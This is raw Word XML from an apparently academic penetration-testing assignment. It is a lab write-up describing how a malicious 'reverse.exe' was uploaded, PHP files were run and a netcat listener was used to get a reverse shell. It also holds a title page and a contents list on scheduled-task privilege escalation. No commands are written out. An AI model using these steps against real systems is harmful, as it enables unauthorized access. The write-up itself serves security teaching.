          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DD731ED" w14:textId="77777777" w:rsidR="003B694C" w:rsidRDefault="003B694C" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14293C94" w14:textId="77777777" w:rsidR="003B694C" w:rsidRDefault="003B694C" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31E1A683" w14:textId="77777777" w:rsidR="003B694C" w:rsidRDefault="003B694C" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F592702" w14:textId="77777777" w:rsidR="003B694C" w:rsidRDefault="003B694C" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D2F38A1" w14:textId="77777777" w:rsidR="003B694C" w:rsidRDefault="003B694C" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11FB3E9B" w14:textId="6677CE17" w:rsidR="003B694C" w:rsidRDefault="003B694C"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After uploading the malicious ‘reverse.exe’ to the remote IP, we executed the ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>exploit.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>’ file to run the ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>upload.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">’. We also started a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B694C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> listener on port 4443 on </w:t>
      </w:r>
      <w:r w:rsidR="00FD336E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">gain a reverse shell. As seen in the image, we were successful in gaining access as a user named </w:t>
      </w:r>
      <w:r w:rsidR="00FD336E" w:rsidRPr="00FD336E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rupert</w:t>
      </w:r>
      <w:r w:rsidR="00FD336E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2A63C7" w14:textId="77777777" w:rsidR="003B694C" w:rsidRDefault="003B694C" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6240534F" w14:textId="2CC51203" w:rsidR="00013CF5" w:rsidRDefault="00013CF5"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F50CACB" wp14:editId="528A9D79">
            <wp:extent cx="8229600" cy="3831590"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18252982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98208"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3831590"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8233FC" w14:textId="77777777" w:rsidR="00C93C39" w:rsidRDefault="00C93C39" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B9FF77F" w14:textId="77777777" w:rsidR="00C93C39" w:rsidRDefault="00C93C39" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62FBC1AE" w14:textId="77777777" w:rsidR="00C93C39" w:rsidRDefault="00C93C39" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58F7BECD" w14:textId="77777777" w:rsidR="00C93C39" w:rsidRDefault="00C93C39" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79C4144B" w14:textId="77777777" w:rsidR="00C93C39" w:rsidRDefault="00C93C39" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="563BE451" w14:textId="77777777" w:rsidR="00C93C39" w:rsidRDefault="00C93C39" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3129EE57" w14:textId="77777777" w:rsidR="00C93C39" w:rsidRDefault="00C93C39" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C96F38C" w14:textId="77777777" w:rsidR="00C93C39" w:rsidRDefault="00C93C39" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CD8E68C" w14:textId="77777777" w:rsidR="00C93C39" w:rsidRDefault="00C93C39" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43FAB11B" w14:textId="30FC7D3D" w:rsidR="00C93C39" w:rsidRDefault="00C93C39"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The flag for the machine is highlighted below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752AC316" w14:textId="77777777" w:rsidR="00C93C39" w:rsidRDefault="00C93C39" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3472653E" w14:textId="34E3B05E" w:rsidR="00C93C39" w:rsidRDefault="00C93C39"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DF1E4B6" wp14:editId="1D3242A2">
            <wp:extent cx="6515100" cy="3200400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1517917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1791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15100" cy="3200400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FD79FC" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12C7016B" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21F936CC" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E710BD0" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53CFB40E" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A404B3D" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3842C39D" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E94BA3D" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E2C06C5" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="524E35DA" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2245EB4F" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7542A4FB" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E508A71" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="154E525D" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="006A02FE">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C2EEBFC" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRPr="009D41A8" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>CSOC 1020: Assignment #3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1FCD2D" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRPr="00B0390B" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>August 13, 2023</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020F451E" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EDB367D" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552215">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Prepared By</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ashish Kishor Hedau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC621CB" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E0B450E" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:id w:val="675535497"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="116521E6" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:jc w:val="both"/>
          </w:pPr>
          <w:r>
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="6FD2391D" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="12950"/>
            </w:tabs>
            <w:jc w:val="both"/>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37283759" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">Privilege Escalaion vulnerability through unsecure Scheduled task </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc137283759 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6EE5EF17" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="12950"/>
            </w:tabs>
            <w:jc w:val="both"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:lang w:val="en-CA" w:eastAsia="en-CA"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc137283760" w:history="1">
            <w:r w:rsidRPr="0085561B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc137283760 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="06123261" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="12950"/>
            </w:tabs>
            <w:jc w:val="both"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:lang w:val="en-CA" w:eastAsia="en-CA"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc137283761" w:history="1">
            <w:r w:rsidRPr="0085561B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc137283761 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="032371CF" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="12950"/>
            </w:tabs>
            <w:jc w:val="both"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:lang w:val="en-CA" w:eastAsia="en-CA"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc137283762" w:history="1">
            <w:r w:rsidRPr="0085561B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Recommendations</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc137283762 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="01D1B904" w14:textId="77777777" w:rsidR="005D4EB6" w:rsidRDefault="005D4EB6" w:rsidP="005D4EB6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
